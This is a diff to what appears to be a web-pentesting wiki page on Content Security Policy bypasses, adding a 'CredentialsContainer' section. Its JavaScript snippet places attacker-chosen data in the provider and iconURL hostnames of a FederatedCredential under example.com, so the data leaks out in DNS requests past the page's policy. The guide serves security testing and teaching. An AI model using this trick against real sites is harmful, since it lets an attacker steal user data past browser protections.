diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index c017f6de1..a7d78784c 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
 
+### CredentialsContainer
+
+The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
+
+```javascript
+navigator.credentials.store(
+  new FederatedCredential({
+    id:"satoki", 
+    name:"satoki", 
+    provider:"https:"+your_data+"example.com", 
+    iconURL:"https:"+your_data+"example.com"
+    })
+  )
+```
+
+
 ## Checking CSP Policies Online
 
 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)